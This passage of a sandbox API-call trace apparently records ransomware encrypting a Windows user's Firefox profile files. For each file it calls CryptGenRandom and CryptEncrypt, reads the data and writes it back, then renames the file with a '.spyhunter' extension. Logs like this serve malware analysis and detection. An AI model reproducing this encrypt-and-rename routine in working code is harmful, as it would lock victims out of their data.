(in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f104, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f104*=0x30, lpOverlapped=0x0) returned 1 [0139.213] CloseHandle (hObject=0xb4) returned 1 [0139.213] GetProcessHeap () returned 0x2c0000 [0139.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0139.213] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.spyhunter") returned 135 [0139.213] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.spyhunter")) returned 1 [0139.214] GetProcessHeap () returned 0x2c0000 [0139.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0139.214] GetProcessHeap () returned 0x2c0000 [0139.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.214] GetProcessHeap () returned 0x2c0000 [0139.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbe360 | out: hHeap=0x2c0000) returned 1 [0139.214] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f148 | out: pbBuffer=0x270f148) returned 1 [0139.214] GetProcessHeap () returned 0x2c0000 [0139.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.214] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f140*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f140*=0x30) returned 1 [0139.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache") returned 126 [0139.215] StrStrW (lpFirst="test-phish-simple.cache", lpSrch=".txt") returned 0x0 [0139.215] GetProcessHeap () returned 0x2c0000 [0139.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.215] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f104, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f104*=0x2c, lpOverlapped=0x0) returned 1 [0139.216] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffffd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.216] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x270f104, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f104*=0x2c, lpOverlapped=0x0) returned 1 [0139.216] GetProcessHeap () returned 0x2c0000 [0139.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.216] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.216] WriteFile (in: hFile=0xb4, lpBuffer=0x270f144*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f104, lpOverlapped=0x0 | out: lpBuffer=0x270f144*, lpNumberOfBytesWritten=0x270f104*=0x4, lpOverlapped=0x0) returned 1 [0139.216] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f104, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f104*=0x30, lpOverlapped=0x0) returned 1 [0139.216] CloseHandle (hObject=0xb4) returned 1 [0139.216] GetProcessHeap () returned 0x2c0000 [0139.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0139.217] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.spyhunter") returned 136 [0139.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.spyhunter")) returned 1 [0139.217] GetProcessHeap () returned 0x2c0000 [0139.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0139.217] GetProcessHeap () returned 0x2c0000 [0139.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.217] GetProcessHeap () returned 0x2c0000 [0139.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbe218 | out: hHeap=0x2c0000) returned 1 [0139.217] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f140 | out: pbBuffer=0x270f140) returned 1 [0139.217] GetProcessHeap () returned 0x2c0000 [0139.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.218] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f138*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f138*=0x30) returned 1 [0139.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.218] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore") returned 130 [0139.218] StrStrW (lpFirst="test-malware-simple.sbstore", lpSrch=".txt") returned 0x0 [0139.218] GetProcessHeap () returned 0x2c0000 [0139.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.218] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0fc*=0xe8, lpOverlapped=0x0) returned 1 [0139.219] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.219] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x270f0fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0fc*=0xe8, lpOverlapped=0x0) returned 1 [0139.219] GetProcessHeap () returned 0x2c0000 [0139.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.219] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.219] WriteFile (in: hFile=0xb4, lpBuffer=0x270f13c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0fc, lpOverlapped=0x0 | out: lpBuffer=0x270f13c*, lpNumberOfBytesWritten=0x270f0fc*=0x4, lpOverlapped=0x0) returned 1 [0139.219] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f0fc*=0x30, lpOverlapped=0x0) returned 1 [0139.219] CloseHandle (hObject=0xb4) returned 1 [0139.220] GetProcessHeap () returned 0x2c0000 [0139.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0139.220] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.spyhunter") returned 140 [0139.220] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.spyhunter")) returned 1 [0139.221] GetProcessHeap () returned 0x2c0000 [0139.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0139.221] GetProcessHeap () returned 0x2c0000 [0139.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.221] GetProcessHeap () returned 0x2c0000 [0139.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4290 | out: hHeap=0x2c0000) returned 1 [0139.222] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f140 | out: pbBuffer=0x270f140) returned 1 [0139.222] GetProcessHeap () returned 0x2c0000 [0139.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.222] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f138*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f138*=0x30) returned 1 [0139.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.222] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset") returned 127 [0139.222] StrStrW (lpFirst="test-malware-simple.pset", lpSrch=".txt") returned 0x0 [0139.222] GetProcessHeap () returned 0x2c0000 [0139.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.222] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0fc*=0x10, lpOverlapped=0x0) returned 1 [0139.223] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.223] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x270f0fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0fc*=0x10, lpOverlapped=0x0) returned 1 [0139.223] GetProcessHeap () returned 0x2c0000 [0139.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.224] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.224] WriteFile (in: hFile=0xb4, lpBuffer=0x270f13c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0fc, lpOverlapped=0x0 | out: lpBuffer=0x270f13c*, lpNumberOfBytesWritten=0x270f0fc*=0x4, lpOverlapped=0x0) returned 1 [0139.224] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f0fc*=0x30, lpOverlapped=0x0) returned 1 [0139.224] CloseHandle (hObject=0xb4) returned 1 [0139.224] GetProcessHeap () returned 0x2c0000 [0139.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0139.224] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.spyhunter") returned 137 [0139.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.spyhunter")) returned 1 [0139.225] GetProcessHeap () returned 0x2c0000 [0139.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0139.225] GetProcessHeap () returned 0x2c0000 [0139.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.225] GetProcessHeap () returned 0x2c0000 [0139.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbe0d0 | out: hHeap=0x2c0000) returned 1 [0139.225] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f138 | out: pbBuffer=0x270f138) returned 1 [0139.225] GetProcessHeap () returned 0x2c0000 [0139.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.225] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f130*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f130*=0x30) returned 1 [0139.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.225] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache") returned 128 [0139.225] StrStrW (lpFirst="test-malware-simple.cache", lpSrch=".txt") returned 0x0 [0139.225] GetProcessHeap () returned 0x2c0000 [0139.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.226] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0f4*=0x2c, lpOverlapped=0x0) returned 1 [0139.226] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffffd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.226] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x270f0f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0f4*=0x2c, lpOverlapped=0x0) returned 1 [0139.227] GetProcessHeap () returned 0x2c0000 [0139.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.227] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.227] WriteFile (in: hFile=0xb4, lpBuffer=0x270f134*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0f4, lpOverlapped=0x0 | out: lpBuffer=0x270f134*, lpNumberOfBytesWritten=0x270f0f4*=0x4, lpOverlapped=0x0) returned 1 [0139.227] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f0f4*=0x30, lpOverlapped=0x0) returned 1 [0139.227] CloseHandle (hObject=0xb4) returned 1 [0139.227] GetProcessHeap () returned 0x2c0000 [0139.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0139.227] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.spyhunter") returned 138 [0139.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.spyhunter")) returned 1 [0139.228] GetProcessHeap () returned 0x2c0000 [0139.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0139.228] GetProcessHeap () returned 0x2c0000 [0139.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.228] GetProcessHeap () returned 0x2c0000 [0139.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc43e8 | out: hHeap=0x2c0000) returned 1 [0139.229] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f130 | out: pbBuffer=0x270f130) returned 1 [0139.229] GetProcessHeap () returned 0x2c0000 [0139.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.229] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f128*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f128*=0x30) returned 1 [0139.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite") returned 115 [0139.229] StrStrW (lpFirst="index.sqlite", lpSrch=".txt") returned 0x0 [0139.230] GetProcessHeap () returned 0x2c0000 [0139.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.230] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0ec*=0x2800, lpOverlapped=0x0) returned 1 [0139.382] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.382] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f0ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0ec*=0x2800, lpOverlapped=0x0) returned 1 [0139.382] GetProcessHeap () returned 0x2c0000 [0139.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.382] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.382] WriteFile (in: hFile=0xb4, lpBuffer=0x270f12c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0ec, lpOverlapped=0x0 | out: lpBuffer=0x270f12c*, lpNumberOfBytesWritten=0x270f0ec*=0x4, lpOverlapped=0x0) returned 1 [0139.383] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f0ec*=0x30, lpOverlapped=0x0) returned 1 [0139.383] CloseHandle (hObject=0xb4) returned 1 [0139.383] GetProcessHeap () returned 0x2c0000 [0139.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.383] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite.spyhunter") returned 125 [0139.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite.spyhunter")) returned 1 [0139.384] GetProcessHeap () returned 0x2c0000 [0139.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.384] GetProcessHeap () returned 0x2c0000 [0139.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.384] GetProcessHeap () returned 0x2c0000 [0139.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc2cc0 | out: hHeap=0x2c0000) returned 1 [0139.385] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f130 | out: pbBuffer=0x270f130) returned 1 [0139.385] GetProcessHeap () returned 0x2c0000 [0139.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.385] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f128*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f128*=0x30) returned 1 [0139.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.385] GetProcessHeap () returned 0x2c0000 [0139.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.385] GetProcessHeap () returned 0x2c0000 [0139.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c248 | out: 